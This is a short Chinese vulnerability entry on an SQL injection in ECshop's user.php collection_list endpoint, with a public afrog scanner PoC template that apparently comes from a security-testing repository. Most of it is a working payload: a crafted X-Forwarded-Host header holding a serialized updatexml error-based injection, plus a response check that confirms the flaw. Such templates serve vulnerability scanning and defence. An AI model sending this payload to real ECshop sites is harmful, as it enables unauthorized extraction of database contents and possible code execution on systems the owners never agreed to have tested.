ecshop-collection-list-sqli: ECshop Collection List sqli

漏洞描述

ECshop Collection List 存在 SQL 注入漏洞，攻击者可通过该漏洞获取数据库敏感信息，甚至执行任意代码。

PoC代码[已公开]

id: ecshop-collection-list-sqli

info:
  name: ECshop Collection List sqli
  author: 曦shen
  severity: high
  description: |-
    ECshop Collection List 存在 SQL 注入漏洞，攻击者可通过该漏洞获取数据库敏感信息，甚至执行任意代码。
  tags: ecshop,sqli
  created: 2023/10/25

set:
  r1: randomInt(10000, 99999)
rules:
  r0:
    request:
      method: GET
      path: /user.php?act=collection_list
      headers:
        X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 31)))
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/ecshop-collection-list-sqli.yaml